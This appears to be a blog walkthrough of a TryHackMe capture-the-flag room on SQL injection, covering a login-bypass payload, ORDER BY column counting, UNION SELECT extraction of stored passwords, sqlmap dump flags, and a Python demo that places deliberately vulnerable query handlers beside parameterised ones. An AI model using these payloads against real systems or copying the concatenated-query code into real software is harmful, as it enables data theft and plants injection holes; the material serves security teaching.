Premise

In this walkthrough, we cover the steps taken to test a web application for a SQL injection vulnerability and then exploit it. We used TryHackMe Advent of Cyber 2 / Day 5 / Someone stole Santa’s gift list! as the practical scenario.

TryHackMe Advent of Cyber Challenge Description

After last year’s attack, Santa and the security team have worked hard on reviving Santa’s personal portal. Hence, ‘Santa’s forum 2’ went live.

After the attack, logs have revealed that someone has found Santa’s panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you’ll find the copy of the website and your goal is to replicate the attacker’s actions by dumping the gift list!

Challenge Questions

  • Without using directory brute forcing, what’s Santa’s secret login panel?
  • How many entries are there in the gift database?
  • What did Paul ask for?
  • What is the flag?
  • What is admin’s password?

The Phases of a SQL Injection Attack

A SQL injection attack usually happens in a few phases:

  1. Breaking the Logic: The first thing I do is try to break the database query, usually through a search field or a login form, by injecting a single quote (or whatever character closes the string literal the input lands in). If the application returns a database error, that’s a strong sign the input reaches the query unescaped and an error-based or UNION-based injection is possible. If there’s no error but the page changes in some way, the input is probably still reaching the query and a blind SQL injection may be possible; that’s slower to pull off because the data has to be inferred one true/false condition at a time.
  2. Finding the Number of Columns: Next, I use ORDER BY to work out how many columns the vulnerable query returns (not how many the table has; the UNION in the next step must match the SELECT list of the original query). I keep increasing the number in the ORDER BY clause until I get an error. The last number that worked is the number of columns.
  3. Extracting Information: Once I know the column count, I use UNION SELECT statements, padded with NULLs to match it, to start pulling out sensitive information: the database name, table and column names, and finally the contents of interesting tables such as user password hashes.

Manual vs. Automatic SQL Injection

There are two main ways to go about a SQL injection attack:

  • Manual Method: This way is time-consuming because you have to try a lot of different SQL payloads, and you need a good understanding of SQL and of the specific database engine behind the application. But the results you get are accurate and comprehensive, and every request you send is one you chose. This method is best when you’re working on a single target.
  • Automatic Method: This is the faster way. You can use tools like SQLMap, Burp Suite, or OWASP ZAP to automate the detection and extraction. The downside is that the results aren’t always accurate or complete, especially when a WAF or input filter sits in front of the application, and the tools are noisy. It’s great when you need to cover many targets at once. If the automatic method doesn’t work, I always fall back to the manual method.

Practical Demonstration

To show you how this all works in practice, I’ll walk you through the “TryHackMe Advent of Cyber 2 Day 5” challenge.

First, I’ll show you how to bypass a login form using a simple payload: ' OR 1=1-- . The quote closes the username string, OR 1=1 makes the WHERE clause always true, and the -- comments out the rest of the query, including the password check, so you are logged in as the first user the query returns (usually the admin). Note that for MySQL the -- comment must be followed by a space (or you can use # instead), which is why the payload is typed with a trailing space.

Next, I’ll show you how to exploit a search field. I’ll use the ORDER BY trick to find the number of columns, and then I’ll use a UNION SELECT statement to pull out all the usernames and passwords from the users table.
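Here is the login bypass and the three-phase search-field attack described above (break the query, count the columns with ORDER BY, extract with UNION SELECT), reproduced end to end against a throwaway in-memory SQLite database, with the hardened parameterised handlers beside the vulnerable ones. This is an added example written for this page, not code from the TryHackMe room or the video; the schema, the table and column names (users, gifts) and the sample rows are constructed for the demo and are not the room’s data.

```python
"""Added example: the login bypass and the break / ORDER BY / UNION SELECT phases
from the walkthrough, run against an in-memory SQLite database (sqlite3, stdlib).
The schema and rows below are constructed for the demo; they are not the room's data."""
import sqlite3

# Constructed sample data. The attacker's goal is the users table.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users (username, password) VALUES ('admin', 'S3cretPassw0rd'), ('santa', 'hohoho');
CREATE TABLE gifts (id INTEGER PRIMARY KEY, name TEXT, gift TEXT);
INSERT INTO gifts (name, gift) VALUES ('Paul', 'bike'), ('Ann', 'book');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


# --- Vulnerable handlers: user input is concatenated into the SQL string (on purpose) ---
def vuln_login(db, username, password):
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def vuln_search(db, term):
    query = f"SELECT name, gift FROM gifts WHERE name LIKE '%{term}%'"
    return db.execute(query).fetchall()


# --- Hardened handlers: parameterised queries, so the same payloads are just data ---
def safe_login(db, username, password):
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def safe_search(db, term):
    return db.execute("SELECT name, gift FROM gifts WHERE name LIKE ?",
                      (f"%{term}%",)).fetchall()


# Login bypass: ' OR 1=1-- turns the WHERE clause into  username = '' OR 1=1  and
# comments out the password check, so the first row of users is returned.
def bypass_login(db):
    return vuln_login(db, "' OR 1=1--", "wrong-password")


# Phase 1: a lone quote unbalances the string literal and the database raises an error.
def breaks_logic(db):
    try:
        vuln_search(db, "'")
    except sqlite3.OperationalError:
        return True
    return False


# Phase 2: ORDER BY n errors as soon as n exceeds the number of columns the
# vulnerable SELECT returns; the last n that worked is the column count.
def count_columns(db, max_cols=10):
    for n in range(1, max_cols + 1):
        try:
            vuln_search(db, f"' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


# Phase 3: UNION SELECT with a column list padded with NULL to the count from phase 2.
# The 'zzz' prefix makes the original LIKE match nothing, so only injected rows come back.
def dump_users(db, ncols):
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    return vuln_search(db, f"zzz' UNION SELECT {', '.join(cols)} FROM users--")


if __name__ == "__main__":
    db = connect()
    print("bypass_login ->", bypass_login(db))       # admin
    print("breaks_logic ->", breaks_logic(db))       # True
    ncols = count_columns(db)
    print("columns      ->", ncols)                  # 2
    print("dump_users   ->", dump_users(db, ncols))  # the two users rows
    # The hardened handlers treat the same payloads as plain strings.
    print("safe_login   ->", safe_login(db, "' OR 1=1--", "wrong-password"))  # None
    print("safe_search  ->", safe_search(db, "'"))                            # []
```

The vulnerable handlers are written with f-strings on purpose so the payloads land inside the SQL text exactly as they would in a PHP or Python app that builds queries by concatenation; the only change in the hardened handlers is passing the values as bound parameters, which is the actual fix for this class of bug.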

Finally, I’ll show you how to do the same thing using SQLMap. I’ll capture the search request with Burp Suite, save it to a file, and then feed that file to SQLMap with -r so it automatically finds the database version, enumerates the tables, and dumps the contents.

Technical Commands Used

Here are the commands used in the terminal during the demonstration. The list was transcribed from the spoken commands in the video, so it is rendered here as the SQL clause and sqlmap flags they refer to; the database name is whatever sqlmap reports for the target, not a value from this page:

  • ORDER BY n, typed into the search field with increasing n until the query errors, to find the column count
  • sudo sqlmap -r <request file>, where the request file is the request captured and saved from Burp Suite
  • --tamper=space2comment, which replaces spaces in the payloads with inline comments when a filter blocks them
  • --current-db, to print the name of the database the application is using
  • --tables, to enumerate the tables
  • -D <database> -T users, to select that database and its users table
  • -T users -C password --dump, to dump the password column of the users table

Room Answers / Day 5

Without using directory brute forcing, what’s Santa’s secret login panel?

Visit Santa’s secret login panel and bypass the login using SQLi

How many entries are there in the gift database?

What did Paul ask for?

What is the flag?

What is admin’s password?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.
